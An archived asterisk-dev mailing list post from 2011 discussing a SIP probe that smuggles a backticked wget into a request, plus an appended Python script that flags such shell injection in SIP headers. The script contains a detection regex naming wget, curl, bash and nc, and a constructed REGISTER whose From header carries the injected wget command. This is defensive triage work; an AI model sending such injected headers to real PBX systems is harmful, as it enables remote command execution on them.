[asterisk-dev] A new kind of SIP attack ?

Jeff LaCoursiere jeff at sunfone.com
Mon Sep 12 08:17:18 CDT 2011


On Mon, 2011-09-12 at 09:13 -0400, Tom Browning wrote:
> On Mon, Sep 12, 2011 at 8:28 AM, Jeff LaCoursiere <jeff at sunfone.com> wrote:
> 
> > Would be interesting to let your honeypot accept the request and perform the
> > wget, and see what happens next...
> 
> Well I looked at the URL passed to the backticked wget command line
> and it is a NOOP as far as I can tell.  (Using a couple of URL
> vulnerability assessment tools and old-fashioned telnet direct
> methods!)
> 
> I expect that the URL is strictly to populate a web server log that
> will provide a convenient list of IP addresses vulnerable to the shell
> injection and available for further hacking attempts.
> 

Right.  So let your honeypot enter that list (by letting it perform the
wget), and see what comes next... will you get a more serious probe that
actually tries to accomplish something with it?  Where will it come
from?  I think there would be some use to that.

> Sadly some perhaps widely used configuration is subject to easy shell
> injection (so folks are now scanning for it).  The SIP equiv of "Bobby
> Tables": http://xkcd.com/327/

That is certainly the scary part.  How many folks are using canned
installations these days?  Elastix, Trixbox, PBIF, etc.  If one of them
is vulnerable it seems paramount to figure out how.

Cheers,

j
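Added example (mine, not code from the thread or from Asterisk): a small Python triage check that parses the header section of a SIP request and flags values carrying a backticked wget or similar command substitution, the shape Tom's honeypot saw. The sample request, its hosts and addresses, and the metacharacter heuristic are constructed assumptions.

```python
import re

# Heuristic (an assumption of this example, not from the thread): flag backtick
# or $( ) command substitution, and a separator followed by a common fetch/shell
# command, anywhere in a header value. Tune the command list to your environment.
SHELL_INJECTION_RE = re.compile(
    r"`[^`]*`|\$\([^)]*\)|[;|&]\s*(?:wget|curl|sh|bash|nc)\b"
)

def parse_sip_headers(message: str) -> dict:
    """Map lower-cased header names to their first value; body and folded lines are ignored."""
    headers = {}
    lines = message.replace("\r\n", "\n").split("\n")
    for line in lines[1:]:  # lines[0] is the request line
        if not line.strip():
            break  # blank line terminates the header section
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), value.strip())
    return headers

def find_injection_attempts(message: str) -> list:
    """Return (header_name, matched_text) for every header value that trips the heuristic."""
    hits = []
    for name, value in parse_sip_headers(message).items():
        match = SHELL_INJECTION_RE.search(value)
        if match:
            hits.append((name, match.group(0)))
    return hits

# Constructed sample: a REGISTER whose From display name carries a backticked
# wget, the pattern discussed in the thread. Hosts and IPs are placeholders.
SAMPLE_REQUEST = (
    "REGISTER sip:pbx.example.invalid SIP/2.0\r\n"
    "Via: SIP/2.0/UDP 192.0.2.10:5060;branch=z9hG4bK-constructed\r\n"
    "From: \"`wget http://example.invalid/probe`\" <sip:100@pbx.example.invalid>;tag=1\r\n"
    "To: <sip:100@pbx.example.invalid>\r\n"
    "Call-ID: constructed-call-id@192.0.2.10\r\n"
    "CSeq: 1 REGISTER\r\n"
    "Content-Length: 0\r\n\r\n"
)

if __name__ == "__main__":
    for header, text in find_injection_attempts(SAMPLE_REQUEST):
        print(f"suspicious {header} header: {text}")
```

This only triages captured traffic or a honeypot's log; the durable fix is never handing header values to a shell in the first place.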




More information about the asterisk-dev mailing list